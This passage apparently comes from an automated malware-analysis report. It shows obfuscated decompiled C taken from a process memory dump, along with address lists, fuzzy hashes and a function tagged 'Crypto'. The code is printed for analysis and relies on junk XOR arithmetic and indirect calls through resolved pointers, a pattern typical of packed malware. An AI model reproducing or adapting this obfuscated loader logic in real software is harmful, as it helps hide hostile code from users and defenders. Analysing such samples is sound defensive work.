						 *_t894 =  *_t894 + _t85;
						_t86 = _t672 + 0x41cf79; // 0x41cf79
						_v32 = _v32 & 0x00000000;
						 *_t894 =  *_t894 ^ _t86;
						_push( *((intOrPtr*)(_t672 + 0x41f064))(_v32, _t784));
						_pop( *_t91);
						_push(_v40);
						_pop( *_t93);
					}
					_t895 =  &(_t894[1]);
					 *_t895 =  *_t894;
					_t95 = _t672 + 0x41cd11; // 0x41cd11
					 *_t895 =  *_t895 & 0x00000000;
					 *_t895 =  *_t895 + _t95;
					_t96 = _t672 + 0x41c5be; // 0x41c5be
					_v40 = _v40 & 0x00000000;
					 *_t895 =  *_t895 ^ _t96;
					_t613 =  *((intOrPtr*)(_t672 + 0x41f068))(_v40, _t864, _v36);
					 *(_t672 + 0x41caaa) =  *(_t672 + 0x41caaa) & 0x00000000;
					 *(_t672 + 0x41caaa) =  *(_t672 + 0x41caaa) ^ (_t720 & 0x00000000 | _t613);
					_t723 = _t720;
					_t614 =  *((intOrPtr*)(_t672 + 0x41f068))();
					 *_t895 =  *_t895 & 0x00000000;
					 *_t895 =  *_t895 ^ _t614;
					_t106 = _t672 + 0x41d112; // 0x41d112
					_v36 = 0;
					 *_t895 =  *_t895 + _t106;
					_t616 =  *((intOrPtr*)(_t672 + 0x41f060))(_v36, _t823);
					 *_t895 =  *_t895 - _t723;
					 *_t895 =  *_t895 + _t616;
					_t110 = _t672 + 0x41c899; // 0x41c899
					_v40 = 0;
					 *_t895 =  *_t895 | _t110;
					_t618 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40, _t723);
					_t725 =  *_t895;
					_t896 =  &(_t895[1]);
					 *_t114 = _t618;
					_v36 = _v36 + _t725;
					_push(_v36);
					_pop(_t619);
					_t853 = _t851;
					_v32 = _t784;
					_t727 = _t725 & 0x00000000 | _t784 - _v32 ^  *(_t672 + 0x41c8e8);
					_t787 = _v32;
					if(_t727 > _t619) {
						_t122 = _t672 + 0x41d112; // 0x41d112
						_v40 = _v40 & 0x00000000;
						 *_t896 =  *_t896 ^ _t122;
						_t126 = _t672 + 0x41c899; // 0x41c899
						 *_t896 =  *_t896 - _t672;
						 *_t896 =  *_t896 | _t126;
						_push( *((intOrPtr*)(_t672 + 0x41f064))(_t672, _v40));
						_pop( *_t128);
						_push(_v40);
						_pop( *_t130);
					}
					_t897 =  &(_t896[1]);
					 *(_t672 + 0x41d0d6) =  *(_t672 + 0x41d0d6) & 0x00000000;
					 *(_t672 + 0x41d0d6) =  *(_t672 + 0x41d0d6) ^ _t853 ^  *_t897 ^  *_t896;
					_t856 = _t853;
					_t135 = _t672 + 0x41cc19; // 0x41cc19
					 *_t897 = _t135;
					_t623 =  *((intOrPtr*)(_t672 + 0x41f060))(_v36);
					_v32 = _v32 & 0x00000000;
					 *_t897 =  *_t897 ^ _t623;
					_t141 = _t672 + 0x41c058; // 0x41c058
					_v32 = 0;
					 *_t897 =  *_t897 + _t141;
					_t625 =  *((intOrPtr*)(_t672 + 0x41f060))(_v32, _v32);
					_t898 = _t897 - 0xfffffffc;
					 *_t145 = _t625;
					_v40 = _v40 + (_t727 & 0x00000000) +  *_t897;
					_push(_v40);
					_pop(_t626);
					_t825 = _t823;
					_v36 = _t787;
					_t730 =  *(_t672 + 0x41c493);
					_t790 = _v36;
					if(_t730 > _t626) {
						_t152 = _t672 + 0x41cc19; // 0x41cc19
						 *_t898 =  *_t898 ^ _t730;
						 *_t898 =  *_t898 | _t152;
						_t153 = _t672 + 0x41c058; // 0x41c058
						 *_t898 =  *_t898 & 0x00000000;
						 *_t898 =  *_t898 + _t153;
						_t626 =  *((intOrPtr*)(_t672 + 0x41f064))(_t672, _t730);
					}
					 *_t898 = _t856;
					 *(_t672 + 0x41d0de) = 0 ^ _t626;
					_t859 = 0;
					_t899 = _t864;
					_pop(_t871);
					_t156 = _t672 + 0x41c23b; // 0x41c23b
					 *_t899 =  *_t899 ^ _t790;
					 *_t899 = _t156;
					_t157 = _t672 + 0x41c2e1; // 0x41c2e1
					_v8 = _v8 - _t859;
					_v8 = _v8 | _t157;
					_t629 =  *((intOrPtr*)(_t672 + 0x41f068))(_t859, _t790);
					 *(_t672 + 0x41d2a1) =  *(_t672 + 0x41d2a1) & 0x00000000;
					 *(_t672 + 0x41d2a1) =  *(_t672 + 0x41d2a1) ^ _t825 & 0x00000000 ^ _t629;
					_t828 = _t825;
					_t163 = _t672 + 0x41c6d4; // 0x41c6d4
					_v12 = _v12 ^ _t730;
					_v12 = _v12 + _t163;
					_t164 = _t672 + 0x41cc84; // 0x41cc84
					_v16 = _t164;
					_push( *((intOrPtr*)(_t672 + 0x41f060))(_v32, _t730));
					_pop( *_t167);
					_push(_v40);
					_pop( *_t169);
					_t900 =  &(_t899[1]);
					_v16 = _v16 - _t730;
					_v16 = _v16 + (0 ^ _v16);
					_t170 = _t672 + 0x41c719; // 0x41c719
					_v40 = _v40 & 0x00000000;
					_v20 = _v20 ^ _t170;
					_push( *((intOrPtr*)(_t672 + 0x41f060))(_v40, _t730));
					_pop( *_t175);
					_push(_v36);
					_pop( *_t177);
					_t637 =  *((intOrPtr*)(_t672 + 0x41f060))();
					_v32 = 0;
					_v24 = _v24 ^ _t637;
					_t181 = _t672 + 0x41d2e8; // 0x41d2e8
					_v28 = _v28 ^ _t828;
					_v28 = _v28 | _t181;
					_t639 =  *((intOrPtr*)(_t672 + 0x41f060))(_t828, _v32);
					_v32 = 0;
					_v32 = _v32 + _t639;
					_t185 = _t672 + 0x41ca71; // 0x41ca71
					_v36 = _t185;
					_t641 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40, _v32);
					_pop( *_t188);
					_t731 = _v36;
					_v36 = _t859;
					_push(_t731 + _t641);
					_pop(_t642);
					_t733 = _t731 & 0x00000000 ^ _t871 & 0x00000000 ^  *(_t672 + 0x41c0c4);
					_t874 = _t871;
					if(_t733 > _t642) {
						_t193 = _t672 + 0x41d2e8; // 0x41d2e8
						_v32 = 0;
						 *_t900 =  *_t900 | _t193;
						_t196 = _t672 + 0x41ca71; // 0x41ca71
						 *_t900 =  *_t900 & 0x00000000;
						 *_t900 =  *_t900 ^ _t196;
						_t648 =  *((intOrPtr*)(_t672 + 0x41f064))(_t672, _v32);
						_push(_t874);
						 *(_t672 + 0x41c06b) =  *(_t672 + 0x41c06b) & 0x00000000;
						 *(_t672 + 0x41c06b) =  *(_t672 + 0x41c06b) | _t874 ^  *_t900 | _t648;
					}
					_pop( *_t202);
					_v40 = _t733;
					 *(_t672 + 0x41d067) =  *(_t672 + 0x41d067) & 0x00000000;
					 *(_t672 + 0x41d067) =  *(_t672 + 0x41d067) | _t733 & 0x00000000 ^ _v36;
					_t210 = _t672 + 0x41cefe; // 0x41cefe
					 *_t900 = _t210;
					_t645 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40);
					_v40 = _t828;
					 *(_t672 + 0x41d336) =  *(_t672 + 0x41d336) & 0x00000000;
					 *(_t672 + 0x41d336) =  *(_t672 + 0x41d336) | _t828 - _v40 ^ _t645;
					return _t645;
				}
			}

0x00ea3a14
0x00ea3a14
0x00ea3a14
0x00ea3a15
0x00ea3a18
0x00ea3a1b
0x00ea3a1d
0x00ea3a20
0x00ea3a21
0x00ea3a24
0x00ea3a27
0x00ea3a2a
0x00ea3a2d
0x00ea3a30
0x00ea3a35
0x00ea3a35
0x00ea3a38
0x00ea3a40
0x00ea3a44
0x00ea3a45
0x00ea3a4c
0x00ea3a4e
0x00ea3a55
0x00ea3a5c
0x00ea3a5c
0x00ea3a67
0x00ea4153
0x00ea446d
0x00ea4473
0x00ea447c
0x00ea447f
0x00ea4486
0x00ea448a
0x00ea4493
0x00ea4494
0x00ea4497
0x00ea449a
0x00ea44a0
0x00ea44a7
0x00ea44ad
0x00ea44b4
0x00ea44b7
0x00ea44bd
0x00ea44c5
0x00ea44cc
0x00ea44d2
0x00ea44d5
0x00ea44dc
0x00ea44e2
0x00ea44e9
0x00ea44ec
0x00ea44f2
0x00ea44fa
0x00ea4501
0x00ea4507
0x00ea450a
0x00ea4511
0x00ea4517
0x00ea451e
0x00ea4521
0x00ea4528
0x00ea452b
0x00ea452e
0x00ea4534
0x00ea453c
0x00ea4543
0x00ea4549
0x00ea4549
0x00ea4159
0x00ea4159
0x00ea415f
0x00ea4169
0x00ea416c
0x00ea4172
0x00ea417c
0x00ea417f
0x00ea418b
0x00ea4192
0x00ea4198
0x00ea4199
0x00ea419f
0x00ea41a6
0x00ea41a9
0x00ea41af
0x00ea41b6
0x00ea41b9
0x00ea41c2
0x00ea41c5
0x00ea41ce
0x00ea41d1
0x00ea41dd
0x00ea41e0
0x00ea41e5
0x00ea41e9
0x00ea41ec
0x00ea41ee
0x00ea41fc
0x00ea41fe
0x00ea4201
0x00ea4203
0x00ea420a
0x00ea420e
0x00ea4211
0x00ea4217
0x00ea421e
0x00ea4221
0x00ea422d
0x00ea4234
0x00ea423a
0x00ea423a
0x00ea4240
0x00ea4244
0x00ea4248
0x00ea424b
0x00ea4252
0x00ea4255
0x00ea4258
0x00ea4261
0x00ea4264
0x00ea426a
0x00ea4272
0x00ea4279
0x00ea427f
0x00ea4282
0x00ea4289
0x00ea428c
0x00ea428f
0x00ea4296
0x00ea4299
0x00ea429c
0x00ea42a3
0x00ea42a7
0x00ea42aa
0x00ea42b1
0x00ea42b4
0x00ea42b7
0x00ea42c6
0x00ea42c9
0x00ea42d0
0x00ea42d6
0x00ea42d9
0x00ea42e0
0x00ea42e6
0x00ea42f0
0x00ea42f3
0x00ea42fa
0x00ea42fd
0x00ea4300
0x00ea4306
0x00ea430d
0x00ea4310
0x00ea431c
0x00ea431f
0x00ea4322
0x00ea4329
0x00ea432a
0x00ea432d
0x00ea432e
0x00ea433d
0x00ea433f
0x00ea4344
0x00ea4346
0x00ea434c
0x00ea4353
0x00ea4356
0x00ea435c
0x00ea4366
0x00ea4369
0x00ea4369
0x00ea4371
0x00ea4378
0x00ea437e
0x00ea437f
0x00ea4386
0x00ea438d
0x00ea4390
0x00ea4393
0x00ea4399
0x00ea43a0
0x00ea43a6
0x00ea43a9
0x00ea43b0
0x00ea43b7
0x00ea43ba
0x00ea43bd
0x00ea43c5
0x00ea43cc
0x00ea43d2
0x00ea43d2
0x00ea4551
0x00ea4555
0x00ea4558
0x00ea455b
0x00ea4562
0x00ea4565
0x00ea4568
0x00ea4571
0x00ea4574
0x00ea457a
0x00ea4584
0x00ea4587
0x00ea4593
0x00ea4596
0x00ea4599
0x00ea45a0
0x00ea45a1
0x00ea45a4
0x00ea45b2
0x00ea45b4
0x00ea45b7
0x00ea45b9
0x00ea45bf
0x00ea45c9
0x00ea45cc
0x00ea45d2
0x00ea45dc
0x00ea45df
0x00ea45e5
0x00ea45ec
0x00ea45f2
0x00ea45f2
0x00ea45fe
0x00ea4603
0x00ea460d
0x00ea4611
0x00ea4614
0x00ea461a
0x00ea4621
0x00ea4624
0x00ea462b
0x00ea462e
0x00ea4631
0x00ea463d
0x00ea4644
0x00ea464a
0x00ea4654
0x00ea4657
0x00ea465b
0x00ea465f
0x00ea4662
0x00ea4668
0x00ea4672
0x00ea4675
0x00ea4681
0x00ea4688
0x00ea468e
0x00ea4695
0x00ea4698
0x00ea46a1
0x00ea46a5
0x00ea46af
0x00ea46b2
0x00ea46b9
0x00ea46bc
0x00ea46bf
0x00ea46c5
0x00ea46cf
0x00ea46d2
0x00ea46d8
0x00ea46e0
0x00ea46e7
0x00ea46f2
0x00ea46f5
0x00ea46f8
0x00ea4700
0x00ea4704
0x00ea470a
0x00ea4710
0x00ea471a
0x00ea471d
0x00ea4729
0x00ea4730
0x00ea4736
0x00ea4741
0x00ea4743
0x00ea4744
0x00ea474a
0x00ea4754
0x00ea4757
0x00ea475d
0x00ea4767
0x00ea476a
0x00ea4773
0x00ea4776
0x00ea4781
0x00ea4788
0x00ea478b
0x00ea478e
0x00ea4791
0x00ea4792
0x00ea4793
0x00ea47a0
0x00ea47a5
0x00ea47a7
0x00ea47ad
0x00ea47b4
0x00ea47b7
0x00ea47bd
0x00ea47c4
0x00ea47c7
0x00ea47c7
0x00ea47cd
0x00ea47d4
0x00ea47da
0x00ea47dd
0x00ea47ed
0x00ea47f4
0x00ea47f7
0x00ea47fa
0x00ea4800
0x00ea4807
0x00ea480a
0x00ea4812
0x00ea4819
0x00ea481f
0x00ea4820
0x00ea4821
0x00ea4828
0x00ea482b
0x00ea482e
0x00ea482f
0x00ea4832
0x00ea4835
0x00ea4836
0x00ea4839
0x00ea483b
0x00ea4846
0x00ea4848
0x00ea4849
0x00ea4849
0x00ea484d
0x00ea4850
0x00ea4853
0x00ea4856
0x00ea4857
0x00ea485b
0x00ea485c
0x00ea485e
0x00ea4860
0x00ea4861
0x00ea4861
0x00ea4861
0x00ea4868
0x00ea486b
0x00ea486e
0x00ea4875
0x00ea4879
0x00ea487c
0x00ea4883
0x00ea4887
0x00ea488a
0x00ea4890
0x00ea4898
0x00ea489f
0x00ea48a8
0x00ea48c1
0x00ea3a6d
0x00ea3a73
0x00ea3a76
0x00ea3a79
0x00ea3a7f
0x00ea3a89
0x00ea3a8c
0x00ea3a98
0x00ea3a9f
0x00ea3aa5
0x00ea3aa6
0x00ea3aad
0x00ea3ab0
0x00ea3ab3
0x00ea3aba
0x00ea3abd
0x00ea3ac0
0x00ea3ac7
0x00ea3aca
0x00ea3acd
0x00ea3ad4
0x00ea3ad8
0x00ea3adb
0x00ea3ae3
0x00ea3ae6
0x00ea3ae9
0x00ea3af0
0x00ea3af1
0x00ea3af4
0x00ea3af5
0x00ea3b04
0x00ea3b06
0x00ea3b0b
0x00ea3b0d
0x00ea3b14
0x00ea3b18
0x00ea3b1b
0x00ea3b24
0x00ea3b27
0x00ea3b2d
0x00ea3b2f
0x00ea3b36
0x00ea3b3c
0x00ea3b46
0x00ea3b4a
0x00ea3b4d
0x00ea3b50
0x00ea3b57
0x00ea3b5a
0x00ea3b5d
0x00ea3b63
0x00ea3b6d
0x00ea3b70
0x00ea3b79
0x00ea3b7c
0x00ea3b87
0x00ea3b8e
0x00ea3b91
0x00ea3b94
0x00ea3b97
0x00ea3b98
0x00ea3b99
0x00ea3ba4
0x00ea3ba6
0x00ea3bab
0x00ea3bad
0x00ea3bb3
0x00ea3bba
0x00ea3bbd
0x00ea3bc6
0x00ea3bc9
0x00ea3bc9
0x00ea3bcf
0x00ea3bd6
0x00ea3bdf
0x00ea3be5
0x00ea3bef
0x00ea3bf2
0x00ea3bf8
0x00ea3bff
0x00ea3c02
0x00ea3c08
0x00ea3c12
0x00ea3c15
0x00ea3c1c
0x00ea3c20
0x00ea3c23
0x00ea3c2f
0x00ea3c35
0x00ea3c39
0x00ea3c3c
0x00ea3c3f
0x00ea3c42
0x00ea3c43
0x00ea3c44
0x00ea3c4a
0x00ea3c4d
0x00ea3c50
0x00ea3c53
0x00ea3c55
0x00ea3c5c
0x00ea3c60
0x00ea3c63
0x00ea3c69
0x00ea3c70
0x00ea3c79
0x00ea3c7a
0x00ea3c7d
0x00ea3c80
0x00ea3c80
0x00ea3c8b
0x00ea3c91
0x00ea3c94
0x00ea3c9b
0x00ea3c9f
0x00ea3ca2
0x00ea3ca8
0x00ea3caf
0x00ea3cb2
0x00ea3cbe
0x00ea3cc5
0x00ea3ccb
0x00ea3ccc
0x00ea3cd3
0x00ea3cd7
0x00ea3cda
0x00ea3ce0
0x00ea3cea
0x00ea3ced
0x00ea3cf4
0x00ea3cf7
0x00ea3cfa
0x00ea3d00
0x00ea3d0a
0x00ea3d0d
0x00ea3d15
0x00ea3d18
0x00ea3d1f
0x00ea3d22
0x00ea3d25
0x00ea3d28
0x00ea3d29
0x00ea3d2a
0x00ea3d39
0x00ea3d3b
0x00ea3d40
0x00ea3d42
0x00ea3d48
0x00ea3d4f
0x00ea3d52
0x00ea3d59
0x00ea3d5c
0x00ea3d65
0x00ea3d66
0x00ea3d69
0x00ea3d6c
0x00ea3d6c
0x00ea3d7b
0x00ea3d84
0x00ea3d8b
0x00ea3d91
0x00ea3d92
0x00ea3d9b
0x00ea3d9e
0x00ea3da4
0x00ea3dab
0x00ea3dae
0x00ea3db4
0x00ea3dbe
0x00ea3dc1
0x00ea3dd0
0x00ea3dd7
0x00ea3dda
0x00ea3ddd
0x00ea3de0
0x00ea3de1
0x00ea3de2
0x00ea3ded
0x00ea3def
0x00ea3df4
0x00ea3df6
0x00ea3dfd
0x00ea3e00
0x00ea3e03
0x00ea3e0a
0x00ea3e0e
0x00ea3e11
0x00ea3e11
0x00ea3e19
0x00ea3e20
0x00ea3e26
0x00ea3e27
0x00ea3e27
0x00ea3e28
0x00ea3e2f
0x00ea3e32
0x00ea3e35
0x00ea3e3c
0x00ea3e3f
0x00ea3e42
0x00ea3e4e
0x00ea3e55
0x00ea3e5b
0x00ea3e5c
0x00ea3e63
0x00ea3e66
0x00ea3e69
0x00ea3e72
0x00ea3e7b
0x00ea3e7c
0x00ea3e7f
0x00ea3e82
0x00ea3e8d
0x00ea3e91
0x00ea3e94
0x00ea3e97
0x00ea3e9d
0x00ea3ea4
0x00ea3ead
0x00ea3eae
0x00ea3eb1
0x00ea3eb4
0x00ea3eba
0x00ea3ec0
0x00ea3eca
0x00ea3ecd
0x00ea3ed4
0x00ea3ed7
0x00ea3eda
0x00ea3ee0
0x00ea3eea
0x00ea3eed
0x00ea3ef6
0x00ea3ef9
0x00ea3eff
0x00ea3f02
0x00ea3f05
0x00ea3f0c
0x00ea3f10
0x00ea3f1e
0x00ea3f20
0x00ea3f23
0x00ea3f25
0x00ea3f2b
0x00ea3f35
0x00ea3f38
0x00ea3f3f
0x00ea3f43
0x00ea3f46
0x00ea3f4c
0x00ea3f52
0x00ea3f59
0x00ea3f5f
0x00ea3f60
0x00ea3f66
0x00ea3f6e
0x00ea3f75
0x00ea3f7e
0x00ea3f87
0x00ea3f8a
0x00ea3f90
0x00ea3f98
0x00ea3f9f
0x00ea3fa8
0x00ea3fa8

Memory Dump Source

Source File: 00000001.00000002.699168037.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72f08a90819b8a7d6b902a99b873cf3cacbcc3fbfee91f535511ca024593f170
Instruction ID: 4b49c1ca361a26ec9e80d23688b882c21b7260c13f86a2f4d121160d8fa31efe
Opcode Fuzzy Hash: 72f08a90819b8a7d6b902a99b873cf3cacbcc3fbfee91f535511ca024593f170
Instruction Fuzzy Hash: 2F921272844608CFEF04DFA0C8897EEBBF5FF48310F1944AAD889AA145D7385965CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00EA31B3, Relevance: .6, Instructions: 646
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E00EA31B3(signed int __ebx, signed int __edx, signed int __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t312;
				void* _t314;
				signed int _t315;
				signed int _t318;
				signed int _t321;
				void* _t323;
				void* _t327;
				void* _t331;
				void* _t333;
				void* _t334;
				signed int _t335;
				signed int _t337;
				void* _t339;
				void* _t340;
				signed int _t345;
				signed int _t348;
				void* _t350;
				void* _t351;
				signed int _t355;
				void* _t357;
				intOrPtr _t358;
				signed int _t359;
				signed int _t361;
				signed int _t365;
				signed int _t371;
				signed int _t373;
				void* _t378;
				void* _t380;
				signed int _t383;
				signed int _t386;
				intOrPtr _t390;
				signed int _t396;
				signed int _t398;
				signed int _t402;
				signed int _t405;
				void* _t408;
				void* _t410;
				signed int _t416;
				intOrPtr _t421;
				signed int _t426;
				intOrPtr _t429;
				intOrPtr _t434;
				signed int _t437;
				void* _t442;
				void* _t444;
				signed int _t446;
				signed int _t448;
				signed int _t450;
				signed int _t452;
				signed int _t454;
				signed int _t457;
				signed int _t463;
				signed int _t465;
				signed int _t468;
				signed int _t473;
				signed int _t480;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t500;
				signed int _t502;
				signed int _t505;
				signed int _t507;
				signed int _t510;
				void* _t514;
				signed int _t516;
				signed int _t519;
				signed int _t522;
				signed int _t525;
				signed int _t531;
				signed int _t534;
				signed int _t537;
				signed int _t540;
				void* _t541;
				signed int _t543;
				signed int _t546;
				void* _t553;
				signed int _t555;
				signed int _t557;
				signed int _t560;
				signed int _t563;
				signed int _t566;
				void* _t570;
				signed int _t573;
				void* _t574;
				signed int _t576;
				signed int _t579;
				signed int* _t580;
				signed int* _t581;
				signed int* _t582;
				signed int* _t583;
				signed int* _t584;
				signed int* _t585;
				signed int* _t586;
				signed int* _t587;
				signed int* _t588;
				signed int* _t589;
				signed int* _t590;
				signed int* _t591;
				signed int* _t592;
				signed int* _t593;
				signed int* _t594;
				signed int* _t596;

				_t531 = __edi;
				_t500 = __edx;
				_t437 = __ebx;
				_t1 = _t437 + 0x41c972; // 0x41c972
				_push(_v16);
				 *_t580 = _t1;
				_t312 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push(_t573);
				 *_t580 =  *_t580 - _t573;
				 *_t580 = _t312;
				_t4 = _t437 + 0x41c726; // 0x41c726
				_v12 = 0;
				_push(_v12);
				 *_t580 =  *_t580 | _t4;
				_t314 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_t446 =  *_t580;
				_t581 =  &(_t580[1]);
				 *_t581 =  *_t581 + __esi;
				_t553 = _t314;
				_t315 = _t553 + _t446;
				_t555 = 0;
				_v16 = _t315;
				_t448 = _t446 & 0x00000000 | _t315 & 0x00000000 |  *(__ebx + 0x41c68d);
				_t318 = _v16;
				if(_t448 > _t318) {
					_t11 = _t437 + 0x41c972; // 0x41c972
					_v16 = 0;
					_push(_v16);
					 *_t581 =  *_t581 | _t11;
					_t14 = _t437 + 0x41c726; // 0x41c726
					_push(_t573);
					 *_t581 =  *_t581 - _t573;
					 *_t581 =  *_t581 ^ _t14;
					_t318 =  *((intOrPtr*)(__ebx + 0x41f064))();
				}
				_v12 = _t531;
				 *(_t437 + 0x41c3b5) =  *(_t437 + 0x41c3b5) & 0x00000000;
				 *(_t437 + 0x41c3b5) =  *(_t437 + 0x41c3b5) | _t531 & 0x00000000 ^ _t318;
				_t534 = _v12;
				_t22 = _t437 + 0x41d2f2; // 0x41d2f2
				 *_t581 =  *_t581 & 0x00000000;
				 *_t581 =  *_t581 + _t22;
				_t23 = _t437 + 0x41d08b; // 0x41d08b
				_v12 = _v12 & 0x00000000;
				 *_t581 =  *_t581 | _t23;
				_t321 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _t500);
				 *_t581 =  *_t581 & 0x00000000;
				 *_t581 =  *_t581 | _t321;
				_t28 = _t437 + 0x41c1f0; // 0x41c1f0
				 *_t581 =  *_t581 & 0x00000000;
				 *_t581 =  *_t581 | _t28;
				_t323 =  *((intOrPtr*)(_t437 + 0x41f060))(_t555);
				 *_t30 = _t448;
				 *_t581 =  *_t581 | _t573;
				_t574 = _t323;
				_t576 = 0;
				 *_t581 = _t574 + _v8;
				_t450 =  *(_t437 + 0x41c529);
				_t327 = 0;
				if(_t450 > _t327) {
					_t33 = _t437 + 0x41d08b; // 0x41d08b
					 *_t581 =  *_t581 ^ _t500;
					 *_t581 =  *_t581 ^ _t33;
					_t34 = _t437 + 0x41c1f0; // 0x41c1f0
					_v16 = 0;
					 *_t581 =  *_t581 | _t34;
					_t434 =  *((intOrPtr*)(_t437 + 0x41f064))(_v16, _t500);
					_v16 = _t450;
					 *((intOrPtr*)(_t437 + 0x41cd05)) = _t434;
					_t450 = _v16;
				}
				_t582 = _t581 - 0xfffffffc;
				 *_t582 =  *_t582 ^ _t576;
				 *_t582 =  *_t582 +  *_t581;
				_t41 = _t437 + 0x41d1b0; // 0x41d1b0
				 *_t582 =  *_t582 & 0x00000000;
				 *_t582 =  *_t582 + _t41;
				_t331 =  *((intOrPtr*)(_t437 + 0x41f060))(_t576, _t576);
				 *_t582 =  *_t582 & 0x00000000;
				 *_t582 =  *_t582 + _t331;
				_t43 = _t437 + 0x41c2f3; // 0x41c2f3
				 *_t582 =  *_t582 ^ _t555;
				 *_t582 =  *_t582 ^ _t43;
				_t333 =  *((intOrPtr*)(_t437 + 0x41f060))(_t555, _t500);
				_t452 = _t450 & 0x00000000 ^  *_t582;
				_t583 =  &(_t582[1]);
				 *_t45 = _t333;
				_v8 = _v8 + _t452;
				_push(_v8);
				_pop(_t334);
				_t502 = _t500;
				_v16 = _t502;
				_t454 = _t452 & 0x00000000 | _t502 & 0x00000000 |  *(_t437 + 0x41c51d);
				_t505 = _v16;
				if(_t454 > _t334) {
					_t52 = _t437 + 0x41d1b0; // 0x41d1b0
					 *_t583 =  *_t583 & 0x00000000;
					 *_t583 =  *_t583 ^ _t52;
					_t53 = _t437 + 0x41c2f3; // 0x41c2f3
					 *_t583 =  *_t583 - _t454;
					 *_t583 = _t53;
					_t334 =  *((intOrPtr*)(_t437 + 0x41f064))(_t454, _t505);
				}
				 *_t55 = _t334;
				_push(_v16);
				_pop( *_t57);
				_t335 =  *((intOrPtr*)(_t437 + 0x41f060))();
				_v16 = _v16 & 0x00000000;
				 *_t583 =  *_t583 ^ _t335;
				_t62 = _t437 + 0x41c0f2; // 0x41c0f2
				 *_t583 =  *_t583 - _t505;
				 *_t583 = _t62;
				_t337 =  *((intOrPtr*)(_t437 + 0x41f060))(_t505, _v16);
				 *_t583 = _t337;
				_t65 = _t437 + 0x41cfb1; // 0x41cfb1
				 *_t583 = _t65;
				_t339 =  *((intOrPtr*)(_t437 + 0x41f060))(_v8, _v16);
				_t584 = _t583 - 0xfffffffc;
				 *_t68 = _t339;
				_v16 = _v16 + (_t454 & 0x00000000 |  *_t583);
				_push(_v16);
				_pop(_t340);
				_t557 = _t555;
				_v8 = _t557;
				_t457 = 0 ^  *(_t437 + 0x41cba2);
				_t560 = _v8;
				if(_t457 > _t340) {
					_t75 = _t437 + 0x41c0f2; // 0x41c0f2
					_v16 = _v16 & 0x00000000;
					 *_t584 =  *_t584 ^ _t75;
					_t79 = _t437 + 0x41cfb1; // 0x41cfb1
					_v8 = _v8 & 0x00000000;
					 *_t584 =  *_t584 ^ _t79;
					_t429 =  *((intOrPtr*)(_t437 + 0x41f064))(_v8, _v16);
					_v8 = _t505;
					 *((intOrPtr*)(_t437 + 0x41cbd5)) = _t429;
					_t505 = _v8;
				}
				_pop( *_t87);
				 *_t584 =  *_t584 - _t534;
				 *_t584 =  *_t584 ^ 0 ^ _v8;
				_t89 = _t437 + 0x41cdc3; // 0x41cdc3
				_v8 = 0;
				 *_t584 =  *_t584 + _t89;
				_t92 = _t437 + 0x41c7d0; // 0x41c7d0
				_v16 = 0;
				 *_t584 =  *_t584 | _t92;
				_t345 =  *((intOrPtr*)(_t437 + 0x41f068))(_v16, _v8, _t534);
				_v12 = _t457;
				 *(_t437 + 0x41cb83) =  *(_t437 + 0x41cb83) & 0x00000000;
				 *(_t437 + 0x41cb83) =  *(_t437 + 0x41cb83) ^ (_t457 - _v12 | _t345);
				_t103 = _t437 + 0x41d16f; // 0x41d16f
				_v16 = _v16 & 0x00000000;
				 *_t584 =  *_t584 ^ _t103;
				_t107 = _t437 + 0x41cd88; // 0x41cd88
				 *_t584 =  *_t584 & 0x00000000;
				 *_t584 =  *_t584 ^ _t107;
				_t348 =  *((intOrPtr*)(_t437 + 0x41f060))(_t505, _v16);
				_v16 = _v16 & 0x00000000;
				 *_t584 =  *_t584 ^ _t348;
				_t112 = _t437 + 0x41d272; // 0x41d272
				 *_t584 =  *_t584 & 0x00000000;
				 *_t584 =  *_t584 ^ _t112;
				_t350 =  *((intOrPtr*)(_t437 + 0x41f060))(_t437, _v16);
				_t585 = _t584 - 0xfffffffc;
				 *_t114 = _t350;
				_v16 = _v16 + (_v12 & 0x00000000) +  *_t584;
				_push(_v16);
				_pop(_t351);
				_t507 = _t505;
				 *_t585 = _t507;
				_t463 =  *(_t437 + 0x41c389);
				_t510 = 0;
				if(_t463 > _t351) {
					_t119 = _t437 + 0x41cd88; // 0x41cd88
					 *_t585 =  *_t585 & 0x00000000;
					 *_t585 =  *_t585 ^ _t119;
					_t120 = _t437 + 0x41d272; // 0x41d272
					 *_t585 =  *_t585 & 0x00000000;
					 *_t585 =  *_t585 ^ _t120;
					_t426 =  *((intOrPtr*)(_t437 + 0x41f064))(_t560, _t463);
					 *(_t437 + 0x41cc5a) =  *(_t437 + 0x41cc5a) & 0x00000000;
					 *(_t437 + 0x41cc5a) =  *(_t437 + 0x41cc5a) | _t463 & 0x00000000 | _t426;
					_t463 = _t463;
				}
				_t586 = _t585 - 0xfffffffc;
				 *_t586 = 0 ^  *_t585;
				_t127 = _t437 + 0x41cb2c; // 0x41cb2c
				 *_t586 =  *_t586 ^ _t437;
				 *_t586 =  *_t586 | _t127;
				_t355 =  *((intOrPtr*)(_t437 + 0x41f060))(_t437, _v16);
				_v8 = 0;
				 *_t586 =  *_t586 ^ _t355;
				_t131 = _t437 + 0x41ca15; // 0x41ca15
				_v12 = _v12 & 0x00000000;
				 *_t586 =  *_t586 | _t131;
				_t357 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _v8);
				_t465 =  *_t586;
				_t587 = _t586 - 0xfffffffc;
				_v8 = _t534;
				_push(_t465 + _t357);
				_t537 = _v8;
				_pop(_t358);
				_t540 = _t537;
				if((_t465 & 0x00000000 | _t537 & 0x00000000 ^  *(_t437 + 0x41c82d)) > _t358) {
					_t139 = _t437 + 0x41cb2c; // 0x41cb2c
					_v16 = _v16 & 0x00000000;
					 *_t587 =  *_t587 + _t139;
					_t143 = _t437 + 0x41ca15; // 0x41ca15
					 *_t587 =  *_t587 & 0x00000000;
					 *_t587 =  *_t587 + _t143;
